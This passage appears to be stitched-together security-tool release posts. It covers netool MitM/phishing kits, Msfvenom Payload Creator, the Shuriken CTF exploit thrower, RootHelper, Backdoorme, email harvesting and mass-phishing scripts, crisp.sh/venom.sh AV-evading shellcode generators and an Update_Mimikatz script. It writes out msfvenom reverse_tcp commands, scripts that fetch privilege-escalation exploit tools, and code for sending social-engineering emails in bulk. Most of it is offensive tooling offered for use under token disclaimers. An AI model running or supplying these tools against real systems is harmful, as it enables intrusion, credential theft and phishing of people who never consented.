echo -e "[*]Running Firefox to install the addons.\n"
##Installing The Addons. The process needs to be semi-manually due to Mozilla Firefox security policies.
#Stopping Firefox is it's running.
killall firefox &> /dev/null
#Running it again.
/usr/bin/firefox "$scriptpath/"*.xpi "$scriptpath/.installation_finished.html" &> /dev/null
####

##In case you need to delete the tmp directory, uncomment the following line.
#rm -rf "$scriptpath"; echo -e "[*]Deleted the tmp directory."
echo -e "[**]Firefox Security Toolkit is finished\n"
echo -e "Have a nice day! - Mazin Ahmed"
########################################################################

Source : https://github.com/mazen160

Changelog v-4.6:
The toolkit was named of ‘Single_byte_XOR’ because this version it focous in obfuscating payloads with the inclusion of Shellter PE injector and diferent msf encoders with diferent interactions to evade AV detection (windows binaries) also the tool will ship with the new automated exploit ‘web_delivery’ that execute the 2º stage in ram without touching disk.
we now have 5 modules that trys to evade AV detection (windows):
2 – Backdooring EXE Files -> bdf_backdoor module
4 – Meterpreter (ReL1K) -> powershell payload
5 – Web_delivery (PSH/PYTHON) -> powershell or python
27 – Generate shellcode -> c-to-exe -> veil-evasion
29 – Shellter PE infector -> inject shellcode into windows binaries
☆ ☆ ☆ ☆ ☆
[ Upgraded ]
msfcli replaced by msfconsole

[ Bugs Fixed ]
+ ettercap IPV6 bug -> incorrect target selection /// ///
+ host-a-file -> phishing webpages displays under MitM
[ New Modules ]
+ MitM ROUTER phishing -> capture router credentials
+ unicorn.py -> HTA drive-by URL payload execution
+ java.jar phishing -> Drive-by URL payload execution
+ adobe_flash_hacking_team_uaf -> exploit + mitm + dns_spoof
+ web_delivery msf module -> python or powershell payloads
+ Shellter PE injector (by kyREcon) binaries windows obfuscator

[ Improved ]
+ netool toolkit Gnu Public License (GPL) display
+ build shortcut to toolkit -> gnome-desktop-item-edit
+ file-selection GUI to ettercap -> zenity displays added
+ host-a-file attack -> zenity file-selection GUI added
+ windows payloads encoding (diferent msf encoders/interactions)

Operative Systems Supported:
+ Linux-Ubuntu | Linux-kali | Parrot security OS | backbox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

netool- version 4.6 codename Single_byte_XOR

Netool: its a toolkit written using ‘bash, python, ruby’ that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. this toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, D0S attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet) also uses macchanger to decoy scans changing the mac address.

Rootsector: module allows you to automate some attacks over DNS_SPOOF + MitM(phishing – social engineering) using metasploit, apache2 and ettercap frameworks. like the generation of payloads,shellcode,backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage.

Recently was introduced “inurlbr” webscanner (by cleiton) that allow us to search SQL related bugs, using severeal search engines, also this framework can be used in conjunction with other frameworks like nmap, (using the flag –comand-vul)

Installation:

git clone git://git.code.sf.net/p/netoolsh/opensource-kali opensource
cd opensource
chmod +x INSTALL.sh
./INSTALL.sh

Note for version 4.6 : You must install Manually using source DOwnload
tar xf *.tar.gz
cd your folder
./INSTALL.sh
Update type: u

Example: 

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27
-s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operative Systems Supported:
Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

“TOOLKIT DEPENDENCIES”
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

“SCANNER INURLBR.php”
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

Download : Ubuntu: opensource.tar.gz (26.9 MB)  | Kali-Linux: opensource[kali].tar.gz(26.9 MB)
Source : http://sourceforge.net/projects/netoolsh/
Our Post Before : http://seclist.us/netool-sh-v-4-5-2-released-mitm-pentesting-opensource-t00lkit.html

Changelog v1.4: Add OSX support, bind shell fix, add DLL format
+ Improved OSX support (Thanks @yugoslavskiy)
+ Fix bind shell issue (Thanks @nullmode)
+ Added .dll support (Thanks @nullmode)
+ Removed some colour from the help page
+ Tweaked the output formatting a little

quick way to generate various “basic” Meterpreter payloads via msfvenom (part of the Metasploit framework).

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MPC itself). The rest is to make the user’s life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
+ Can’t remember your IP for a interface? Don’t sweat it, just use the interface name: eth0.
+ Don’t know what your external IP is? MPC will discover it: wan.
+ Want to generate one of each payload? No issue! Try: loop.
+ Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will NOT try to bypass any anti-virus solutions at any stage.
Install
+ Designed for Kali Linux v2.x & Metasploit v4.11+.
+ Kali v1.x should work.
+ OSX 10.11+ should work.
+ Weakerth4n 6+ should work.
+ …nothing else has been tested.

Download : v1.4.zip  | v1.4.tar.gz
Source : https://github.com/g0tmi1k
Our Post Before : http://seclist.us/updates-msfvenom-payload-creator-mpc-v-1-3-2.html

A simple bash-based throwing framework. It’s stupid simple, and configuration is just done by flat files.
+ Adding an exploit
Each exploit belongs in its own directory under exploits. Symlinks work nicely if moving the files isn’t ideal.
Each exploit directory must contain a file named exploit. If this file is executable (chmod +x), it is invoked each round. It is not invoked with any arguments.
The arguments to the exploit are passed in the environment. The most important ones are:

TARGET_HOST - IP or hostname to exploit
    TEAM_NAME - Pretty name of the team being exploited
    FLAG_HOST - IP to send flags to
    FLAG_PORT - Port to send flags to
    FLAG_FILE - File to write flags to (instead of IP:port)

All data from each invokation of the exploit is logged into the logs directory inside the exploit directory. It is automatically created if it does not exist.

+ Blacklists and Whitelists
By default, an exploit is thrown against all teams every round.
To modify this behavior, create a file named whitelist or blacklist in your exploit directory. Any IPs or team names in blacklist are skipped. If whitelist exists, any IPs or teams not contained in the file are skipped.

+ Logging
Exploitation Attempt Logs
All of the exploitation attempts are logged to stdout, as well as syslog.
See config/log for an extensible location to add to the logging.
To set up the syslog endpoint:

cat >> /etc/syslog.conf <<EOF
# Shuriken logs
local3.* /var/log/shuriken
EOF
touch /var/log/shuriken

Per-Exploit Logs
Each exploit attempt gets its own log directory, in the logs directory. Each log directory is timestamped, and includes the team name and target IP. For example, it might look something like: exploits/example_slowpoke/logs/2015-07-01-02:37:58-samurai-104.236.67.106-94230.
Inside of the log directory are a handful of files:

stdout - All data written over stdout
    stderr - All data written over stderr
    status - How the exploit exited (normally, terminated, etc)
    run - Shell script used to invoke the exploit

To see the full list of environment variables, look at the run file generated for each execution.

+ Configuration
Shuriken does not require any command line arguments, all configuration comes from the files in the config/ directory. By default, no configuration should be necessary.
In addition to those documented above, there are also:

before - Function which is invoked before every exploit
    after - Function which is invoked after every exploit
    log - Function used by Shuriken to do its logging
    get_log_dir - Emits the location where the current exploit should log to

Listeners
Some example key listeners are included in listeners/. These are designed as testing tools in lieu of a full-blown Nodachi key listener.
– tcp receives flags via TCP
– fifo receives flags from a FIFO

Installation:

git clone https://github.com/samuraictf/shuriken-framework
cd shuriken-framework
./listeners/tcp &
./shuriken > /dev/null

Source : https://github.com/samuraictf

Disclaimer : This post for Education & Research Purpose Only.

Odysseus – Design of Hardware Trojan
Verilog files modified: (Located at verilog/)
1.Added Trojan.v (implementation of T1)
2.Changed id_stage.v to add the Trojan

Random instruction generator:
A python code is located at testgenerator/random_test_gen.py, along with 100 randomly generated testcases

Random test generator script

Type ‘make’ before running the following scripts:
Scripts for testings:
1.test.sh: Test all EECS470 testcases
Uncomment the code for calling $display in id_stage.v before running 2 and 3.

Test all EECS470 testcases

2.test_random.sh: Test all the randomly generated testcases.
3.test_prob.sh: Test the probability that T1 and T2 are triggered.
4.test_swactivity.sh: Test how many cycles out of total cycles are the two signals (specified in id_stage.v) equal to each other.

Type ‘make syn’ to synthesize the whole processor
fib.s in the current directory is the modified testcase that can trigger the Trojan and cause an infinite loop.

How to use?

git clone https://github.com/xmguo/EECS573_FA15_Project_Design_of_Hardware_Trojan <your clone folder name>
cd into <your clone folder name>

Source : https://github.com/xmguo

Roothelper will aid in the process of privilege escalation on a Linux system that has been compromised, by fetching a number of enumeration and exploit suggestion scripts. The latest version downloads four scripts. Two enumeration shellscripts and two exploit suggesters, one written in perl and the other one in python.

roothelper – A Bash script that will aid with privilege escalation on a Linux system.

Priv-Esc scripts:
+ LinEnum : Shellscript that enumerates the system configuration.
+ unix-privesc-check : Shellscript that enumerates the system configuration and runs some privilege escalation checks as well.
+ linuxprivchecker : A python implementation to suggest exploits particular to the system that’s been compromised.
+ Linux_Exploit_Suggester : A perl script that that does the same as the one mentioned above.

Usage:

git clone https://github.com/NullArray/RootHelper
cd RootHelper
chmod +x roothelper.sh
./roothelper.sh

roothelper.sh script:

#!/bin/bash

function usage()
{ printf "%b \a\n\nRoothelper will aid in the process of privilege escalation on a Linux system you compromised by fetching a number of enumeration
and exploit suggestion scripts. Below is a quick overview of the available options.
The 'Help' option displays this informational message.
The 'Download' option fetches the relevant files and places them in the /tmp/ directory.
The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively, please
note; if the 'mkdir' command is unavailable however, the operation will not succeed and the 'Download' option should be used instead
The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper.\n "
}

# Download and unzip
function dzip()
{    echo "Downloading and extracting scripts..."
    `wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
    `wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`                  
    `wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`  
    `wget -O /tmp/file3.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`   
    for zip in *.zip
    do
        dirname=`echo $zip | sed 's/\.zip$//'`
        if mkdir $dirname
        then
            if cd $dirname
            then
                unzip ../$zip
                cd ..
                rm -f $zip
            else
                echo "Could not unpack $zip - cd failed"
            fi
        else
            echo "Could not unpack $zip - mkdir failed"
        fi
    done
}

PATH="/tmp/"

usage

printf "%b" "\a\n\nTo use roothelper please select an option below.:\n"

PS3='Please enter your choice: '
options=("Help" "Download" "Download and unzip" "Clean up" "Quit")
select opt in "${options[@]}"
do
    case $opt in
        "Help")
            usage
            printf "%b \n"
            ;;
        "Download")
            echo "Downloading scripts to /tmp/"
            `wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
            `wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`                  
            `wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`  
             printf "%b \n"
            ;;
        "Download and unzip")
            dzip
            printf "%b \n"
            ;;
         "Clean up")
            echo "Removing downloaded files"
            find $PATH/* -exec rm {} \;
            printf "%b \n"
            ;;
        "Quit")
            break
            ;;
        *) echo invalid option;;
    esac
done

Source : https://github.com/NullArray/RootHelper

Latest Change 23/12/2015:
+ fixed travis version.
+ added poison module.
+ Fixed Bash and added a second bash backdoor.
+ removed offending tests.

Backdoorme is a simple utility that logs into a Linux machine and gives the user the option to install a slew of backdoors.

BackdoorMe a powerful auto-backdooring utility. This Backdoor has Been Tested on Kali Linux 2.0 and Ubuntu 14.04

Currently enabled backdoors include:
+ Bash
+ Netcat
+ Netcat-traditional
+ Metasploit
+ Perl
+ Pupy
– Python :Please run the dependencies python script to install the necessary dependencies. Backdoorme requires python2.7 or higher.

Instalation:

git clone https://github.com/Kkevsterrr/backdoorme <Your Clone Folder Name>
cd <your Folder>
python dependencies.py
python master.py


Update:
cd backdoorme
git pull

Source: https://github.com/Kkevsterrr | Our post Before

Eharvester is simple script which extracts email address from the given domain for penetration testing process.
Script works on two modes:
+ In first mode you have to specify sitemap of website ,it is fast.Just visit this URL http://www.xml-sitemaps.com/ & make sitemap of victim website ;download text file of urllist.txt & put it in same directory of script.Now it crawl one by one url from urllist.txt & collect email address.
+ Second mode is automatic ; just supply domain name ; it make sitemap & then gather email address.But it is slow .

email-sender

With help of esender you can send social engineering emails to all address which are gathered from eharveter.

Usage of script :

git clone https://github.com/MacAwesome/ehs-supermaster
chmod +x harvester.sh
chmod +x esender.sh
./harvester.sh
./esender.sh

esender.sh script:

#!/usr/bin/env bash 

echo "
 _____                              _           
| ____|          ___  ___ _ __   __| | ___ _ __ 
|  _|    _____  / __|/ _ \  _ \ / _  |/ _ \  __|
| |___  |_____| \__ \  __/ | | | (_| |  __/ |   
|_____|         |___/\___|_| |_|\__,_|\___|_|   
                                                
"

echo "
Enter your email Address"
read address
echo "
Enter your password"
read  -s passsword
echo "
Enter Subject"
read subject
echo "
Enter message. If you want tot send HTML message enter HTML code start with <html>"
read msg

cat output.txt | while read f1
echo "Messages are sending"
do
sendEmail -f $address -t $f1 -u "$subject" -m "$msg" -s smtp.gmail.com:587 -xu "$address" -xp "$passsword"
rm f1
done

harvester.sh script:

#!/usr/bin/env bash 

#E-Harvester is simple script to harvest email address for penetration testing.
#Script is working in two mode
#In first mode you have to create sitemap manually. You can use (http://www.xml-sitemaps.com/) to create sitemap.
#and put sitemap text file in working directory of E-HARVESTING.Give name it to urllist.txt
#Second mode is automatic just specify domain name & it will first crawl website ;then harvest email address ;But it`s slow due to crawling process.

echo "
 _____           _   _    _    ______     _______ ____ _____ _____ ____  
| ____|         | | | |  / \  |  _ \ \   / / ____/ ___|_   _| ____|  _ \ 
|  _|    _____  | |_| | / _ \ | |_) \ \ / /|  _| \___ \ | | |  _| | |_) |
| |___  |_____| |  _  |/ ___ \|  _ < \ V / | |___ ___) || | | |___|  _ < 
|_____|         |_| |_/_/   \_\_| \_\ \_/  |_____|____/ |_| |_____|_| \_\
                                                                         
"
echo "Please choose method"

echo "
1. If you have sitemap of website than make name urllist.txt & Put in same directory(work Fast)
2. Generate sitemap than harvest email(Automatic but slow)
"
read m1
if [ "$m1" = "1" ];then
echo "
Script is workng,Please be Patient & give some time to harvest it.
"
cat urllist.txt | while read f1
do

w3m $f1 >> f1
perl -wne'while(/[\w\.]+@[\w\.]+/g){print "$&\n"}' f1 | sort -u >> output.txt
rm f1
done

cat output.txt
echo "
Harvesting is complete.Open output.txt file to view email address.
"
fi

if [ "$m1" = "2" ];then
echo "
Please Enter Website To Harvest Email Address 
For example http://tipstrickshack.blogspot.com
"
read choice
echo "
Now we have to make urllist of website.So be Patient & give some time to harvest it.
"
wget --spider --recursive --no-verbose --output-file=wgetlog.txt "$choice"
sed -n "s@.\+ URL:\([^ ]\+\) .\+@\1@p" wgetlog.txt | sed "s@&@\&amp;@" > urllist.txt
rm wgetlog.txt
cat urllist.txt | while read f1
do
w3m $f1 >> f1
perl -wne'while(/[\w\.]+@[\w\.]+/g){print "$&\n"}' f1 | sort -u >> output.txt
rm f1
done

cat output.txt
echo "
Harvesting is complete. Open output.txt file to view email address.
"
echo "
Use E-sender to send email to harvested email Address
"
fi

Source: https://github.com/MacAwesome

Changelog v1.4.1 : Supports non-root users & non english OSs.

MPC-v1-4-1
quick way to generate various “basic” Meterpreter payloads via msfvenom (part of the Metasploit framework).

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MPC itself). The rest is to make the user’s life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
+ Can’t remember your IP for a interface? Don’t sweat it, just use the interface name: eth0.
+ Don’t know what your external IP is? MPC will discover it: wan.
+ Want to generate one of each payload? No issue! Try: loop.
+ Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will NOT try to bypass any anti-virus solutions at any stage.
Install
+ Designed for Kali Linux v2.x & Metasploit v4.11+.
+ Kali v1.x should work.
+ OSX 10.11+ should work.
+ Weakerth4n 6+ should work.
+ …nothing else has been tested.

Installation using git:

git clone https://github.com/g0tmi1k/mpc && cd mpc
./mpc.sh

update
cd mpc 
git pull

Download : v1.4.1.zip  | v1.4.1.tar.gz
Source : https://github.com/g0tmi1k
Our Post Before : http://seclist.us/msfvenom-payload-creator-mpc-v-1-4-released.html

[ DISCLAMER ]
The author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by law.

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) “the python funtion will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).
—
‘shellcode generator’ tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..”P.S. some payloads are undetectable by AV soluctions yes!!!” one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

CRISP.SH 1.0.7 – metasploit Shellcode generator/compiler/listenner (this script has been tested on Kali 2.0, Ubuntu 14.04, Arch Linux, FreeBSD, Redhat, Centos, Fedora and Mac OSX)

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

Features:
option – build – target – format – output
—
1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – PYTHON – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – RUBY – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – webserver – PHP – PHP
—
V – msfvenom exercises console
F – FAQ (frequent ask questions)
R – exit shellcode generator

Usage:

download crisp-shellcode-generator.zip
unzip it
cd (your unzip folder)
./crisp.sh

[ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE? ]
The default way to generate a windows binarie payload (.exe) using msfvenom its achieved through -f flag (Output format)
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allow us to build shellcode in diferent formats
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the follow command: sudo msfvenom --help-formats

now lets generate a simple shellcode to windows/shell/reverse_tcp
chosing powershell as output format "note that we will not use
the flag -o (Save the payload) option, this way the shellcode
generated will only displays in current terminal windows".
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

Download : crisp-shellcode-generator.zip | crisp-shellcode-generator-shell
Source :http://sourceforge.net/p/crisp-shellcode-generator/

[ DISCLAMER ]
The author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by law.

Latest change v1.0.8:
+ Biprodeep python execution example
+ 0entropy powershell
+ output folder fix
+ misspeeling fixes

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) “the python funtion will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).
—
‘shellcode generator’ tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..”P.S. some payloads are undetectable by AV soluctions yes!!!” one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

venom.sh v1.0.8

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

Features:
option – build – target – format – output
—
1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – PYTHON – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – RUBY – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – webserver – PHP – PHP
—
V – msfvenom exercises console
F – FAQ (frequent ask questions)
R – exit shellcode generator

Usage:

git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell
cd crisp-shellcode-generator-shell
./venom.sh

UPdates:
cd cd crisp-shellcode-generator-shell
git pull

[ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE? ]
The default way to generate a windows binarie payload (.exe) using msfvenom its achieved through -f flag (Output format)
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allow us to build shellcode in diferent formats
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the follow command: sudo msfvenom --help-formats

now lets generate a simple shellcode to windows/shell/reverse_tcp
chosing powershell as output format "note that we will not use
the flag -o (Save the payload) option, this way the shellcode
generated will only displays in current terminal windows".
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

our post before
Source :http://sourceforge.net/p/crisp-shellcode-generator/

Bash script to take the powerkatz.dll files, encode them using base64 and then replace the old binaries with the new in the Invoke-Mimikatz.ps1 powershell file.

update-mimikatz

Usage:
./Update_Mimikatz.sh [arg]
– ps1 > Invoke-Mimikatz.ps1
– x64 > powerkatz_x64.dll
– x32 > powerkatz_x32.dll

Download:

git clone https://github.com/Graph-X/Update_Mimikatz && cd Update_Miikatz
chmod +x Update_Mimikatz.sh
./Update_Mimikatz.sh

Update_Mimikatz Script:

#!/bin/bash
#
# Update Mimikatz
# Created 1-12-16 by @GraphX
# Last Updated: 1-21-2016
# Description:
#	The script will take your 32 bit and 64 bit 
#	Powerkatz dll files, encode them to b64 and
#	update the Invoke-Mimikatz.ps1 file
###################################################
set -e
ESC_SEQ="\033["
COL_RESET=$ESC_SEQ"0m"
COL_RED=$ESC_SEQ"31;01m"
COL_GREEN=$ESC_SEQ"32;01m"
COL_BLUE=$ESC_SEQ"34;01m"
COL_MAGENTA=$ESC_SEQ"35;01m"
#Attempt to backup the powershell script in the event that I break it
backup() {

#Get just the filename and not the extension
FILENAME=`echo $MKATZ_FILE`.bak
#does the powershell script exist and have we already made a backup?
if [[ -e $MKATZ_FILE && ! -e $FILENAME ]]; then

#make a backup since we haven't already
        cp $MKATZ_FILE $FILENAME 
	echo -e "[*] Backing up file saved to $FILENAME" 
	return 0
fi
#No powershell no washey  Either typo or can't follow directions
if [[ ! -e $MKATZ_FILE ]]; then
        echo -e "$COL_RED[-] Could not find powershell script. please make sure it's correct in the command line.$COL_RESET"
        return 1
fi
#Do we already have a backup?
if [[ -e $FILENAME ]]; then
	#We don't make another backup because of the potential to overwrite a good backup with garbage
        echo -e "[*] Looks like a backup has already been made. moving on"
		return 0
fi
}


#This is the meat and potatoes of the script
update() {
#Here we grab just the base64 strings and line number in an array from the ps1 for each arch
#This part was a pain in the ass to write so I hope this is appreciated.
#lessons learned while slaving away on this:
#The base64 strings are too large to be handled with sed as a normal variable.
#What I had to do was stream the file contents and then redirect the stdout to an awk session using heredoc. 

#Trust but verify.  Do we have the correct files?
if [[ -e $MKATZ_FILE ]]; then
	if  [ $(grep -c 'PEBytes64 = \"' $MKATZ_FILE) -ne 0 ]; then
		#Looks like a valid invoke PE script. Fuck it, let's fly!
		
		#Were we given valid DLLs? Use file mime-type for best guess
		if  [[ $(file --mime-type $PKATZ64 | rev | cut -d ' ' -f 1 | rev) == application/x-dosexec  &&  $(file --mime-type $PKATZ32 | rev | cut -d ' ' -f 1 | rev) == application/x-dosexec ]]; then
			#both the dll files match their expected mime types.  We can proceed
			echo -e "$COL_GREEN[+] $PKATZ64 and $PKATZ32 appear to be the proper file type.$COL_RESET"
		else
			echo -e "$COL_RED[-] Unable to process given files. Please check spelling and proper file type and try again.$COL_RESET"; exit 1 
		fi
	else
		echo -e "$COL_RED[-] Unable to validate $MKATZ_FILE as a proper PE reflection script. Please try again.$COL_RESET"; exit 1
	fi
else
	echo -e "$COL_RED[-] Unable to find $MKATZ_FILE. Please verify the location and try again $COL_RESET"; exit 1
fi	
		
		

#
#We use two for loops to run through both ARCHs here
#THIS IS WHERE THE NEW INFORMATION GETS POPULATED FROM THE DLLS AND ADDED TO THE POWERSHELL FILE
#


#The if statement could likely be shortened, but for right now it works as is.
for a in $(seq 0 1); do
	if [ $a == 0 ]; then
		echo -e "[*] Updating the 64 bit library"
		ARCH=""
		ARCH="64"
		PKATZ="$PKATZ64"
		LINE[$a]=`grep -n "PEBytes64 = \"" $MKATZ_FILE | cut -d ':' -f 1`
		OLDKATZ[$a]=`grep "PEBytes64 = \"" $MKATZ_FILE | cut -d ':' -f 1 | tr -d '"'`
	else
		echo -e "[*] Updating the 32 bit library"
		PKATZ="$PKATZ32"
		ARCH=""
		ARCH="32"
		OLDKATZ[$a]=`grep "PEBytes32 = \"" $MKATZ_FILE | cut -d ':' -f 1 | tr -d '"'`
		LINE[$a]=`grep -n "PEBytes32 = \"" $MKATZ_FILE | cut -d ':' -f -1`
	fi
############################################################################
#
#This section is where the base64 strings created from the DLL files are added to the powershell
#the OUTPUT variable holds the base64 encoding the 64bit payload and then 32.
#md5sums are created to ensure consistency and verifiable source. This feature will be 
#added in the future.  Right now it's good for error checking though.
#
#As it just so happens, we cannot just stuff the new file in to the powershell script. The base64 string
#is waaaaay too long.  Therefore we will read 1024 charcters at a time.
#######################################################################################################
		
	#OUTPUT will be the stream variable that we pipe back to the while loop
	OUTPUT=`base64 -w 0 $PKATZ`
	
	#get md5sum for error checking
	NEWMD5=`md5sum <<< $OUTPUT`
	NEWMD5=`echo $NEWMD5 | cut -d ' ' -f 1`
	
	#Token to mark beginning of the file 
	w=0;

	#while loop to stream $OUTPUT from the base64 conversion of the powerkatz.dll file
	#Awk sucks but I couldn't stream the string through sed because it exceeds the kernel's ARG_MAX value
	while read -r -n 1024 char; do
		if [[ $w == 0 ]]; then
			w=1
			awk -i inplace 'BEGIN{FS=OFS="\""} {if (NR == "'${LINE[$a]}'")  {$2="'$char'"} print $0;}' $MKATZ_FILE
		else
			awk -i inplace 'BEGIN{FS=OFS="\""} {if (NR == "'${LINE[$a]}'") {$2=$2"'$char'"} print $0;}' $MKATZ_FILE
		fi	
		done <<< $OUTPUT

	#grab the base64 string from the mimikatz file.  It should be different now.
	NEWHASH=`grep "PEBytes$ARCH = \"" $MKATZ_FILE | cut -d '"' -f 2 | tr -d '"'`
	#Get the md5sum of base64 string now in the powershell
	NEWSUM=`md5sum <<< $NEWHASH`
	NEWSUM=`echo $NEWSUM | cut -d ' ' -f 1`
	#md5sum checking 
	echo -e "[*] MD5 of the base64 string for x$ARCH in the $MKATZ_FILE is $NEWSUM"
	echo -e "[*] The new md5 of base64 string from the powerkatz dll is $NEWMD5"
	if [[ $NEWSUM !=  $NEWMD5 ]]; then 
		echo -e  "$COL_RED[-]***MD5sums Do NOT Match***$COL_RESET" | read -p " "
		#echo "NEWSUM content length is ${#NEWSUM}" > ./error
		#echo "NEWMD5 content length is ${#NEWMD5}" >> ./error 
		echo -e "$COL_RED[-] Something went wrong with the upgrade\n$COL_RESET"
		cp $FILENAME $MKATZ_FILE 
		x=1 #shit's not right.  These sums should match
	else
		echo -e "$COL_GREEN[+] Library for "$ARCH"bit Mimikatz passed MD5 check$COL_RESET"
	fi

done
if [ $x == 0 ]; then 
	return 0 
else
	return 1
fi	
}

#just making things pretty
#usage menu:
show_parms() {
		echo -e "\n\n$COL_BLUE\tRTFM for Update-Mimimkatz.sh$COL_RESET\n"
		printf "\t Usage: $0 [args] \n\n"
		printf "\t-ps1  > Invoke-Mimikatz.ps1 file\n"
		printf "\t-x64  > powerkatz_x64.dll file\n"
		printf "\t-x32  > powerkatz_32bit.dll file \n"
		printf "Command example:\n"
		printf "#$0 -ps1 ./Invoke-Mimikatz.ps1 -x64 ./powerkatz_x64.dll -x32 ./powerkatz_x32.dll\n\n\n"
}

##########################################
#main subroutine
x=0
#If we don't have everything submitted, then RTFM
if [ $# -lt 6 ]
then
	show_parms
        exit
fi

VARS=`echo "$*" | sed 's/ [^ ]*$//'`
while [ $# -gt 1 ] ; do
        
	case $1 in
